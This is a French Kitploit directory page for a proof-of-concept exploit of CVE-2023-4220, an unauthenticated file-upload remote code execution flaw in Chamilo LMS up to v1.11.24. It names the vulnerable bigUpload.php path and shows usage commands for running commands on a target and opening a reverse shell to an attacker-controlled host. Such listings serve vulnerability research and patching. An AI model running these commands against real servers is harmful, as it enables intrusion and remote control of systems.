Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-4226-POC — Preuve de concept pour CVE-2023-4220 - Chamilo LMS : Exécution de code à distance non authentifiée via un fichier de téléchargement volumineux | Kitploit
Outils/GitHubGitHub/krishnan-tech/cve-2023-4226-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubkrishnan-tech/cve-2023-4226-poc

CVE-2023-4226-POC

Preuve de concept pour CVE-2023-4220 - Chamilo LMS : Exécution de code à distance non authentifiée via un fichier de téléchargement volumineux

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
11il y a 2 ansPas encore vérifié

CVE-2023-4220 POC

Plus d'informations sur CVE-2023-4220: StarLabs Advisory

Résumé

ProduitChamilo
ÉditeurChamilo
SévéritéÉlevée - Les adversaires peuvent exploiter des vulnérabilités logicielles pour obtenir une exécution de code à distance non authentifiée.
Versions affectées<= v1.11.24
Versions testéesv1.11.24 (dernière version au moment de la rédaction)
Identifiant CVECVE-2023-4220
Description CVETéléchargement de fichier sans restriction dans la fonctionnalité de téléchargement de gros fichiers dans /main/inc/lib/javascript/bigupload/inc/bigUpload.php dans Chamilo LMS <= v1.11.24 permet à des attaquants non authentifiés d'effectuer des attaques de script intersite stocké et d'obtenir une exécution de code à distance via le téléchargement d'un web shell.
Classification CWECWE-434: Téléchargement sans restriction d'un fichier de type dangereux
Classification CAPECCAPEC-650: Téléchargement d'un Web Shell vers un serveur Web

Preuve de concept (PoC)

Exécuter des commandes directement

Pour exécuter des commandes directement, utilisez la commande suivante :

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami

Obtenir un reverse shell

Pour obtenir un reverse shell, utilisez la commande suivante :

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>

Télécharger l’outil